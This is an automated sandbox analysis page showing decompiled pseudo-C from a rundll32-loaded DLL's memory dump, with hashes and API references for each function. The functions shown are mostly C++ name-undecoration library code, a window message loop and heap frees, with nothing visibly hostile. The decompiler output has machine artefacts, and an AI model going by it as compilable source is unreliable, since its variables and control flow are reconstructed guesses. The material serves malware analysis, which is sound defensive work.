Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction ID: db32c1024e391476e5cdf26b8d57ef01a1901657407386c4c16bdeae4e47b44c
Opcode Fuzzy Hash: 7d246a1fdf75e9af7c05d0d311cdd578202093742d17d7a48fe81ccd6d4acd59
Instruction Fuzzy Hash: 91C18E7590024ADFEF15CF94C88099FBBB6FF08395F214569F8056B20AD732EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF24, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000CF24(void* __edx, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				void* __ebp;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char** _t82;
				char* _t83;
				char _t84;
				signed int* _t112;
				char* _t115;
				intOrPtr* _t117;
				signed int* _t118;
				intOrPtr _t120;
				intOrPtr* _t121;
				signed int _t123;

				_t113 = __edx;
				_t50 =  *0x1004d054; // 0x940b3682
				_v8 = _t50 ^ _t123;
				_t82 = _a4;
				_t117 =  *0x1004e004; // 0x0
				_v48 = _t82;
				_t84 =  *_t117;
				_t53 = _t84 + 0xffffffd0;
				_v33 = _t84;
				if(_t84 + 0xffffffd0 > 9) {
					if(_t84 != 0x3f) {
						if(E1000D3E3(_t117, "template-parameter-", 0x13) != 0) {
							if(E1000D3E3(_t117, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E100071BE( &_v56, 0x1004e004, 0x40);
									L20:
									_t83 = _t56[1];
									_t115 =  *_t56;
								} else {
									_t115 = 0;
									_t83 = 0;
									 *0x1004e004 = _t117 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t120 = _t117 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x1004e004 = _t120;
							E1000BC98(_t113,  &_v44);
							if(( *0x1004e00c & 0x00004000) == 0 ||  *0x1004e014 == 0) {
								E100076A6(E1000723E( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E1000BD27( &_v44,  &_v24, 0x10);
								_t121 =  *0x1004e014; // 0x0
								 *0x1004223c(E10010036( &_v44,  &_v24));
								if( *_t121() == 0) {
									E100076A6(E1000723E( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E100076C8( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E10006E34( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t120 = _t117 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E1000C18C(__edx,  &_v44, 0);
						_t115 =  *_t76;
						_t83 = _t76[1];
						_t77 =  *0x1004e004; // 0x0
						_v32 = _t115;
						_v28 = _t83;
						_t78 = _t77 + 1;
						 *0x1004e004 = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x1004e004 = _t78 - 1;
							E10007596( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t83 = _v28;
							_t115 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x1004dffc; // 0x0
							if( *_t118 != 9 && _t115 != 0) {
								_t59 = E1000A9CF(0x1004e020, 8);
								if(_t59 != 0) {
									 *_t59 = _t115;
									_t59[1] = _t83;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t115;
						_t57[1] = _t83;
						goto L27;
					}
				} else {
					_t112 =  *0x1004dffc; // 0x0
					 *0x1004e004 = _t117 + 1;
					E100075C8(_t112, _t82, _t53);
					_t57 = _t82;
					L27:
					return E100037EA(_t57, _v8 ^ _t123, _t113);
				}
			}

APIs

Replicator::operator[].LIBVCRUNTIME ref: 1000CF61
DName::operator=.LIBVCRUNTIME ref: 1000CFB3

Strings

generic-type-, xrefs: 1000CFEC
template-parameter-, xrefs: 1000CFC5
@, xrefs: 1000D0C9

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction ID: e026a952384d41eb90ae7b1f9d44a7b3bc4911ee2c14a530ba52aab493f896e0
Opcode Fuzzy Hash: 138bd7d1e047c867c0a897e6d0aad874662d5c1623397badb2a104a952a59643
Instruction Fuzzy Hash: 48611771D002499FEB10DF54D985BEEBBF8EF09380F10801AE605E7295DB74AD45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000218B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000218B(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a16) {
				struct tagMSG _v32;
				struct _WNDCLASSEXA _v80;
				void* _t26;
				struct HINSTANCE__* _t39;

				_t39 = _a4;
				LoadStringA(_t39, 0x82, 0x1004db68, 0x64);
				LoadStringA(_t39, 0x81, 0x1004dbd0, 0x64);
				_v80.cbSize = 0x30;
				_v80.style = 3;
				_v80.lpfnWndProc = E10001AC4;
				_v80.cbClsExtra = 0;
				_v80.cbWndExtra = 0;
				_v80.hInstance = _t39;
				_v80.hIcon = 0;
				_v80.hCursor = LoadCursorA(0, 0x7f00);
				_v80.hbrBackground = 6;
				_v80.lpszMenuName = 0x81;
				_v80.lpszClassName = 0x1004dbd0;
				_v80.hIconSm = 0;
				RegisterClassExA( &_v80);
				_t26 = E100012B1(_t39, _a16);
				if(_t26 != 0) {
					if(GetMessageA( &_v32, 0, 0, 0) == 0) {
						L4:
						return _v32.wParam;
					}
					do {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
					} while (GetMessageA( &_v32, 0, 0, 0) != 0);
					goto L4;
				}
				return _t26;
			}

APIs

LoadStringA.USER32 ref: 100021AA
LoadStringA.USER32 ref: 100021BA
LoadCursorA.USER32 ref: 100021E5
RegisterClassExA.USER32 ref: 10002206

Part of subcall function 100012B1: GetVersionExA.KERNEL32(?), ref: 100012E0
Part of subcall function 100012B1: CreateWindowExA.USER32 ref: 1000131E
Part of subcall function 100012B1: ShowWindow.USER32(00000000,?), ref: 1000132E
Part of subcall function 100012B1: UpdateWindow.USER32 ref: 10001335

GetMessageA.USER32 ref: 10002228
TranslateMessage.USER32 ref: 10002234
DispatchMessageA.USER32 ref: 1000223E
GetMessageA.USER32 ref: 1000224B

Strings

0, xrefs: 100021BE

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Message$LoadWindow$String$ClassCreateCursorDispatchRegisterShowTranslateUpdateVersion
String ID: 0
API String ID: 1669850144-4108050209
Opcode ID: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction ID: 6fe8cfb5187b65730e66161c813667806370dfcb888eacca90ee75b3e607f7b9
Opcode Fuzzy Hash: 1c36e70d199e3722fff3a6eed99da0b3f5838ac0bb385f56671e7e76504a532a
Instruction Fuzzy Hash: 0721F872D01229AAEB11DFA5DE84EDFBBBCEF49754F11401AF600F2140D7B99902CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10008D42, Relevance: 15.3, APIs: 10, Instructions: 338
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10008D42(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x1004e004; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E10007662(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x1004e004 = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E10007500( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E10007748( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t213 = E1000723E( &_v24,  &_v32);
							E100076A6(_t143,  &_v32,  &_v16);
							_v16 = _v32;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								E100077A0( &_v16, E10007637(_t213,  &_v32, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x1004e004 = _t228 - 1;
						_t159 = E10009F87( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E10007500( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E10007500( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E10007748( &_v16,  &_v24);
									}
								}
							}
							E1000B576(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E1000B576(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x10042dd4;
							_v28 = 2;
							E10007748( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x1004e004 = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E10007500( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x1004e004 = _t51;
							_t187 = E10009F87( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x1004e004 = _t228;
						E10007596( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E10007615(_t226, _a4,  &_v32, E10008D42( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x1000922a; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M10009212))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E10007500( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

APIs

shared_ptr.LIBCMT ref: 10008DAE
shared_ptr.LIBCMT ref: 10008DF6
shared_ptr.LIBCMT ref: 10008E8A
operator+.LIBVCRUNTIME ref: 10008EE3
DName::operator=.LIBVCRUNTIME ref: 10008EFB
shared_ptr.LIBCMT ref: 10009145
DName::operator+.LIBCMT ref: 100091B9
operator+.LIBVCRUNTIME ref: 10009202

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction ID: b28e2a1fd94149dd2561a11b9f82f89739496a4781773dc4ca3130be31d5303b
Opcode Fuzzy Hash: 3f0597f9030ab65205f9ced627fb8c410918e4c165c87269fa6c19fcfb40e6f4
Instruction Fuzzy Hash: 1CD18FB1D0424BDFEB00CF90C885AEEBBB4FB04380F60816AD955A7289D7799B45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2ED, Relevance: 15.2, APIs: 10, Instructions: 250
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E1000C2ED(void* __edx, signed int* _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				intOrPtr* _t63;
				char* _t64;
				signed int _t72;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t124;
				signed int _t126;
				void* _t129;
				signed int* _t164;
				signed int _t165;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				void* _t176;

				_t163 = __edx;
				_t61 =  *0x1004d054; // 0x940b3682
				_v8 = _t61 ^ _t173;
				_t63 =  *0x1004e004; // 0x0
				_t124 =  *_t63;
				_t64 = _t63 + 1;
				_t164 = _a4;
				_t165 = _t124;
				 *0x1004e004 = _t64;
				_v28 = _t165;
				_t176 = _t124 - 0x45;
				if(_t176 > 0) {
					__eflags = _t124 - 0x52;
					if(__eflags > 0) {
						__eflags = _t124 - 0x53;
						if(_t124 == 0x53) {
							 *_t164 =  *_t164 & 0x00000000;
							_t58 =  &(_t164[1]);
							 *_t58 = _t164[1] & 0x00000000;
							__eflags =  *_t58;
							L53:
							return E100037EA(_t164, _v8 ^ _t173, _t163);
						}
						__eflags = _t124 - 0x54 - 2;
						if(_t124 - 0x54 > 2) {
							L51:
							_t164[1] = _t164[1] & 0x00000000;
							 *_t164 =  *_t164 & 0x00000000;
							_t164[1] = 2;
							goto L53;
						}
						L38:
						E1000BC98(_t163,  &_v40);
						E1000BD27( &_v40,  &_v24, 0x10);
						_t72 = E10010036( &_v40,  &_v24);
						__eflags =  *0x1004e00c & 0x00004000;
						_t166 = _t72;
						if(( *0x1004e00c & 0x00004000) == 0) {
							L42:
							swprintf( &_v24, 0x10, "%d", _t166 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E10006DC1( &_v40,  &_v24);
							_t78 = _v28 - 0x52;
							__eflags = _t78;
							if(_t78 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
								E100076A6(E1000723E( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t164);
								E100076C8( &_v32);
								goto L53;
							}
							_t84 = _t78;
							__eflags = _t84;
							if(_t84 == 0) {
								goto L50;
							}
							_t85 = _t84 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t126 =  *0x1004e014; // 0x0
						__eflags = _t126;
						if(_t126 == 0) {
							goto L42;
						}
						 *0x1004223c(_t72 & 0x00000fff);
						_t89 =  *_t126();
						__eflags = _t89;
						if(_t89 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E10006E34(_t164, _t89);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t124 - 0x4a;
					if(_t124 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x7b);
						_t127 = _t124 - 0x48;
						__eflags = _t124 - 0x48 - 2;
						if(__eflags <= 0) {
							_push( &_v40);
							E100077A0( &_v32, L10009B9E(_t127,  &_v32, __edx, _t164, _t165, __eflags));
							E100077F7( &_v32, 0x2c);
						}
						_t168 = _t165 - 0x46;
						__eflags = _t168;
						if(_t168 == 0) {
							L32:
							E100077A0( &_v32, E1000BC98(_t163,  &_v40));
							E100077F7( &_v32, 0x2c);
							goto L33;
						} else {
							_t169 = _t168 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								L31:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								E100077F7( &_v32, 0x2c);
								goto L32;
							}
							_t170 = _t169 - 1;
							__eflags = _t170;
							if(_t170 == 0) {
								L33:
								E100077A0( &_v32, E1000BC98(_t163,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t171 = _t170 - 1;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L32;
							}
							__eflags = _t171 != 1;
							if(_t171 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t124 - 0x4d;
					if(_t124 != 0x4d) {
						goto L51;
					}
					E1000C5F3(_t124, __edx, _t165,  &_v32);
					E1000C2ED(__edx, _t164);
					L9:
					L10:
					goto L53;
				}
				if(_t176 == 0) {
					_push(_t164);
					L10009B9E(_t124, _t129, __edx, _t164, _t165, __eflags);
					goto L10;
				}
				if(_t124 == 0) {
					 *0x1004e004 = _t64 - 1;
					E100072DE(_t164, 1);
					goto L53;
				}
				if(_t124 == 0x30) {
					E1000BC98(__edx, _t164);
					goto L10;
				}
				if(_t124 == 0x31) {
					__eflags =  *_t64 - 0x40;
					if( *_t64 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E10008798( &_v32, 0x26);
						_push( &_v40);
						E100076A6( &_v32, _t164, L10009B9E(_t124,  &_v32, __edx, _t164, _t165, __eflags));
					} else {
						_v32 = "NULL";
						 *0x1004e004 = _t64 + 1;
						_v28 = 4;
						E1000723E(_t164,  &_v32);
					}
					goto L53;
				}
				if(_t124 == 0x32) {
					E1000CC65(_t124, __edx, _t165, _t164);
					goto L10;
				}
				if(_t124 == 0x34) {
					E1000BF31(_t164);
					goto L10;
				}
				if(_t124 - 0x41 > 1) {
					goto L51;
				}
				E1000A460(__edx, _t164, _t165);
				goto L9;
			}

APIs

DName::operator+.LIBCMT ref: 1000C3B9
UnDecorator::getSignedDimension.LIBCMT ref: 1000C3C4
DName::DName.LIBVCRUNTIME ref: 1000C3D5
UnDecorator::getSignedDimension.LIBCMT ref: 1000C46F
UnDecorator::getSignedDimension.LIBCMT ref: 1000C48C
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4A9
DName::operator+.LIBCMT ref: 1000C4BE
UnDecorator::getSignedDimension.LIBCMT ref: 1000C4E1
swprintf.LIBCMT ref: 1000C552
DName::operator+.LIBCMT ref: 1000C5A9

Part of subcall function 1000A460: DName::DName.LIBVCRUNTIME ref: 1000A484

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction ID: f9c83e7f69799ed626e93f8569c8994f1034e48759f8977a8353ac719b3bb837
Opcode Fuzzy Hash: 3870ca652ee5dd46192f954932dcdd9a1671f71589c666b9744f5de558d7014f
Instruction Fuzzy Hash: 62819376D1070D9AFB14CBA0CD96FFE77B8EB053C1F60401AE506A2089DB78BA44C795

Uniqueness

Uniqueness Score: -1.00%

Function 10023CFC, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10023CFC(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x100439f8;
				if(_t67 != 0x100439f8) {
					E100268B3(_t67);
					_t36 = _a4;
				}
				E100268B3( *((intOrPtr*)(_t36 + 0x3c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x30)));
				E100268B3( *((intOrPtr*)(_a4 + 0x34)));
				E100268B3( *((intOrPtr*)(_a4 + 0x38)));
				E100268B3( *((intOrPtr*)(_a4 + 0x28)));
				E100268B3( *((intOrPtr*)(_a4 + 0x2c)));
				E100268B3( *((intOrPtr*)(_a4 + 0x40)));
				E100268B3( *((intOrPtr*)(_a4 + 0x44)));
				E100268B3( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E100238C6(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E10023931(_t71, _t75);
			}

APIs

_free.LIBCMT ref: 10023D12

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10023D1E
_free.LIBCMT ref: 10023D29
_free.LIBCMT ref: 10023D34
_free.LIBCMT ref: 10023D3F
_free.LIBCMT ref: 10023D4A
_free.LIBCMT ref: 10023D55
_free.LIBCMT ref: 10023D60
_free.LIBCMT ref: 10023D6B
_free.LIBCMT ref: 10023D79

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
Instruction ID: 02d10424f483025c11247d9988229feb7d6f071447483585f46ce33aa515a283
Opcode Fuzzy Hash: 46643b81a24f0458ed114faaef335da02fc76548a0a77645ebc19370622f552b
